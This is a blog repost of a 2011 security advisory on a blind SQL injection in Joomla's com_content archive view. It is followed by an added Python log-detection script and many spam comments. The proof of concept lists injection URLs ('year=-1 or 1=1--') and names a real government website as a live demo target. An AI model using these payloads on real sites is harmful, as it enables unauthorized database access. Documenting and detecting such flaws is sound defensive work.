Sunday, November 13, 2011

Joomla Component (com_content) - Blind SQL Vulnerability

Date:
=====
2011-11-11


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=323


VL-ID:
=====
323


Introduction:
=============
Joomla is a free and open source content management system (CMS) for publishing content on
the World Wide Web and intranets and a model–view–controller (MVC) Web application framework
that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design
patterns, stores data in a MySQL database, and includes features such as page
caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support
for language internationalization.
Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been
more than 21 million downloads. There are over 7,400 free and commercial extensions available
from the official Joomla! Extension Directory and more available from other sources.

(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)


Abstract:
=========
A Vulnerability Laboratory researcher discovered a blind SQL injection vulnerability in the com_content component of the Joomla CMS.


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
A blind SQL injection vulnerability was detected in the com_content component of the Joomla CMS.
The vulnerability allows a remote attacker to inject and execute their own SQL statements against the DBMS of the affected application.
Successful exploitation of the vulnerability can result in compromise of the affected application's DBMS.

Vulnerable Module(s):
                            [+] com_content


Proof of Concept:
=================
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]     
                                                                                
2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--   
                                                                                
3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--   


[x] Demo :

http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 or 1=0--
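
Added example, not part of the original advisory or of Joomla's code: a log check for the request pattern shown in the proof of concept. It flags clients that send several distinct non-integer `year` values to the com_content archive view, which is the true/false pairing blind injection relies on. The combined access log format, the 1-4 digit year allowlist, the threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Client address and request target of a combined-format access log line
# (assumed format). The target may hold raw spaces, as the PoC URLs do, so
# match up to the " HTTP/x.y" token instead of splitting on whitespace.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/\d(?:\.\d)?"')
# Assumption: a legitimate archive request carries a plain 1-4 digit year.
VALID_YEAR = re.compile(r"\d{1,4}")

def bad_year_values(target):
    """Return decoded `year` values of a com_content archive request that fail the allowlist."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_content" not in params.get("option", []):
        return []
    if "archive" not in params.get("view", []):
        return []
    return [v for v in params.get("year", []) if not VALID_YEAR.fullmatch(v)]

def probing_clients(log_lines, threshold=2):
    """Map client -> distinct invalid year values, keeping clients with >= threshold of them.

    Blind injection compares a true and a false condition (1=1 against 1=0),
    so several distinct invalid values from one client separate probing
    from a single mistyped link.
    """
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m["ip"]].update(bad_year_values(m["target"]))
    return {ip: vals for ip, vals in seen.items() if len(vals) >= threshold}

# Constructed sample lines (documentation addresses, not real traffic).
BASE = "/joomla/index.php?option=com_content&view=archive&year="
SAMPLE_LOG = [
    f'198.51.100.7 - - [11/Nov/2011:10:00:01 +0000] "GET {BASE}2011 HTTP/1.1" 200 5120 "-" "-"',
    f'203.0.113.9 - - [11/Nov/2011:10:00:05 +0000] "GET {BASE}-1%20or%201=1-- HTTP/1.1" 200 9876 "-" "-"',
    f'203.0.113.9 - - [11/Nov/2011:10:00:06 +0000] "GET {BASE}-1+or+1%3D0-- HTTP/1.1" 200 1234 "-" "-"',
    f'203.0.113.9 - - [11/Nov/2011:10:00:07 +0000] "GET {BASE}-1 or 1=1-- HTTP/1.1" 200 9876 "-" "-"',
    f'192.0.2.44 - - [11/Nov/2011:10:02:00 +0000] "GET {BASE}20l1 HTTP/1.1" 200 1234 "-" "-"',
]

if __name__ == "__main__":
    for ip, values in probing_clients(SAMPLE_LOG).items():
        print(ip, sorted(values))
```

The same allowlist applied server-side, rejecting or integer-casting `year` before it reaches a query, removes the injection point the log check only observes.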


Risk:
=====
The security risk of the blind SQL injection vulnerability is estimated as critical.


Credits:
========
E.Shahmohamadi


12 comments:

  1. Thanks for sharing your info. I really appreciate your efforts and I will be waiting for your further write ups thanks once again.

  2. very nice thanks for sharing

    hey friend see snow on google
    Type “Let It Snow” on @Google If you click and drag you can wipe the snow away. It is great. source: http://le-titsnow.blogspot.com

  3. This was a nice post and I think it is pretty easy to see from the other comments as well that this post is well written and informative. Thanks a lot.
    source: www.wbupdates.com

  4. There are many types of Joomla components. Some are used to manage a review site or manage the review portion of your web site. This Joomla component allows users to comment and rate.Joomla Web Design

  5. Very nice article presents some useful points... It is good to read and have a nice points on Joomla. Thanks for sharing here.
    joomla website

  6. To get business development create the websites using Joomla. Joomla Extensions and components provides quality and satisfied customers. Migration, Notification system, mailclimp and notes components provinding well websites. Zinavo Technologies

  7. I love learning from others and this article shows me how much I still have to learn. I hope to see more posts in the future.

  8. Joomla is a proficient in a range of programming language. Tasked with altering and extending including PHP, but less familiar such as CSS or Java Script. Developers found in the category of development.
    Web Design Bangalore | SEO Consultant Bangalore

  9. Joomla development provides easy to follow extensions and extensions you can use to make publishing more streamlined and easier, enabling you to get increased traffic, and help you to enhance your money.

    Web Development Company | Best SEO Company in Bangalore

  10. I read your post. Really it's an interesting post by you. Thanks for all the reviews you write about Joomla Extension. This design looks really beautiful.
    Joomla Feed

  11. Joomla is a best seo friendly web development platform to get more business visibility in search engines.

    Digital Marketing Firms in Bangalore | Digital Marketing Agency Bangalore

  12. The information is quite brilliant to read and execute. Thanks for the wonderful information given in the post.

    Responsive Web Design Indore
    Website Development Indore
    Joomla Web Development Company in Indore
